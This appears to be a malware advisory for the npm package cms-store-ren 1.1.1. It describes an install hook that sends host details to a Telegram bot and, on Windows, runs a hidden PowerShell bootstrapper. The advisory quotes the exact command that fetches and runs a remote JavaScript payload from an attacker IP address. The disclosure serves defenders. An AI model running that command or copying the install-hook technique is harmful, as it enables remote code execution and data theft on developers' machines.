cms-store-ren @1.1.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5364
Ecosystem
npm
Summary
The package's scripts.install runs install.js on every npm install . The script unconditionally POSTs the installer's hostname, OS, and architecture to api.telegram.org using a hardcoded bot token and chat ID (install.js:7 BOT_TOKEN = '8877182499:...' , install.js:50-56 builds the message and sends via sendTelegramMessage() ). On Windows, the same script writes a hidden PowerShell bootstrapper that installs Scoop/Winget and Deno, then executes deno -A http://77.90.185.225/deee80f30a6921b4.js — fetching an arbitrary JavaScript payload from a bare-IP HTTP URL and running it with all Deno permissions under a hidden PowerShell window. The package has no legitimate functionality ( index.js only logs a string; placeholder author work1 , description cms install ) and exists solely to deliver the install-time payload. Both install-time host reconnaissance exfiltration and install-time arbitrary remote code execution from attacker infrastructure are present.
Source: amazon-inspector (da3593e36ce898d648883ea6f911a5cec1f75f9e8bda5585f7ff5f8754c821de)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.